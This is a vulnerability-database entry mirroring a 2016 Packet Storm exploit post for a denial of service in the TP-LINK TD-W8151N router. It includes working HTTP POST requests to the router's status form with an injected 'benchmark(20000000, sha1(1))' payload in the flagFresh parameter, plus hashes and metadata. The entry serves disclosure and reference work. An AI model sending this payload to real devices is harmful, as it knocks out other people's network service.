ID

VAR-E-201612-0507


TITLE

TP-LINK TD-W8151N Denial Of Service

Trust: 0.5

sources: PACKETSTORM: 140142

DESCRIPTION

TP-LINK TD-W8151N suffers from a denial of service vulnerability.

Trust: 0.5

sources: PACKETSTORM: 140142

AFFECTED PRODUCTS

vendor:tp linkmodel:td-w8151nscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 140142

EXPLOIT

# Exploit Title: TP-LINK TD-W8151N - Denial of Service
# Date: 2016-12-13
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Home : http://persian-team.ir/
# Tested on: Windows AND Linux
# Demo : https://www.youtube.com/watch?v=WrGgHvhiCGg

POC :

flagFresh Parameter Vulnerable

POST /Forms/status_1 HTTP/1.1
Host: 192.168.1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.1/status.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00

flagFresh=0

Request :

POST /Forms/status_1 HTTP/1.1
Host: 192.168.1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.1/status.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00

flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1

Trust: 0.5

sources: PACKETSTORM: 140142

EXPLOIT HASH

LOCAL

SOURCE

md5: e41c8f3c732ac5d2737a68c9eb72eee8
sha-1: 85ddac8025629dd941797121b2b6b18e21dfe43b
sha-256: f6ce2d3afda8a246b83ea2ee1248aecdf41fe707cea5c4f9a796cccfd4039879
md5: e41c8f3c732ac5d2737a68c9eb72eee8

Trust: 0.5

sources: PACKETSTORM: 140142

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 140142

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 140142

CREDITS

Mojtaba MobhaM

Trust: 0.5

sources: PACKETSTORM: 140142

EXTERNAL IDS

db:PACKETSTORMid:140142

Trust: 0.5

sources: PACKETSTORM: 140142

SOURCES

db:PACKETSTORMid:140142

LAST UPDATE DATE

2022-07-27T09:21:32.862000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:140142date:2016-12-13T04:44:44